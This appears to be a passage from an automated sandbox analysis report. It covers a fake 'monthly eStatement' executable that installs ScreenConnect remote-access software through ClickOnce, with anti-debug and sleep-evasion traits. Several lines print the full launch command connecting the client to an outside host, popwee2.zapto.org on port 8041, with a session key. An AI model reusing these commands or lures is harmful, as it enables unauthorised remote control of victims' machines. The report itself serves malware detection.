                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeAPI coverage: 3.1 %
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe TID: 6132Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5732Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4092Thread sleep time: -151950s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4092Thread sleep time: -280150s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5732Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 5296Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe TID: 7460Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe TID: 7504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F24A4B FindFirstFileExA,0_2_00F24A4B
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeThread delayed: delay time: 40000Jump to behavior
                  Source: Amcache.hve.13.drBinary or memory string: VMware
                  Source: Amcache.hve.13.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.13.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.13.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.13.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.13.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.13.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF28000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3173633903.000001E8CC340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2920588431.0000019A7EE57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3156571081.000002094E4CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.13.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.13.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.13.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.13.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: svchost.exe, 00000005.00000002.3154598845.000002240C02B000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.3154078820.0000000000AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.13.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.13.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: svchost.exe, 00000004.00000002.2920033550.0000019A7D82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: Amcache.hve.13.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: svchost.exe, 0000000E.00000002.3155699966.000002094E483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                  Source: Amcache.hve.13.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.13.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.13.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.13.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.13.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.13.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.13.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.13.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.13.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                  Source: Amcache.hve.13.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                  Source: Amcache.hve.13.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F24573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F24573
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F21000
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F23677 mov eax, dword ptr fs:[00000030h]0_2_00F23677
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F26893 GetProcessHeap,0_2_00F26893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F21493
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F2191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F2191F
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21AAC SetUnhandledExceptionFilter,0_2_00F21AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.ClientService.dll.1.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7160 -ip 7160
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 332
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\rh07btxr.ry4\8448b9tm.6zz\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\screenconnect.clientservice.exe" "?e=support&y=guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=newboom%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\rh07btxr.ry4\8448b9tm.6zz\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\screenconnect.clientservice.exe" "?e=support&y=guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=newboom%20session" "1"
                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21BD4 cpuid 0_2_00F21BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Core.dll VolumeInformation
